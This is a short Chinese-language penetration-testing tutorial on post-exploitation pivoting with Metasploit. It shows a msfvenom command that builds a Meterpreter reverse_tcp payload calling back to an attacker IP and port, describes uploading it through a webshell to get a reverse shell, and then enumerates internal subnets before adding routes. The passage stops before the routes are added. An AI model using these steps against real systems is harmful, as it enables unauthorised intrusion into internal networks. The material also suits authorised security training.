后渗透阶段之基于MSF的路由转发
目录 反弹MSF类型的Shell 添加内网路由 MSF的跳板功能是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的Meterpreter Shell的基础上添加一条去往“内网”的路由,直接使用MSF去访问原本不能直接访问的内网资源,只要路由可达了那么我们使用MSF来进行探测了。 我们现在有下面这个环境: Web服务器通过端口映射,对外提供Web服务。Web服务器上有两张网卡,内网分别还有其他两台服务器,一台开放了http服务,一台开放了SMB服务。拓扑图如下: 反弹MSF类型的Shell 我们通过web渗透,成功往Web服务器上上传了一句话木马,成功用菜刀连接。 然后我们现在想获得一个MSF类型的Shell。 我们先生成一个木马文件 msfvenom -p windows/meterpreter/reverse_tcp lhost= 112.74 .89 .58 lport= 42906 -f exe -o test.exe 用菜刀上传到Web服务器上,然后执行我们的木马程序,Kali成功获得反弹的MSF类型的shell。 添加内网路由 然后我们现在想要继续渗透内网。 我们先获取目标内网相关信息,可以看到该主机上的网卡有两个网段。 run get_local_subnets 如果我们不添加这两个网段路由的话,是探测不到这两个网段其他主机的。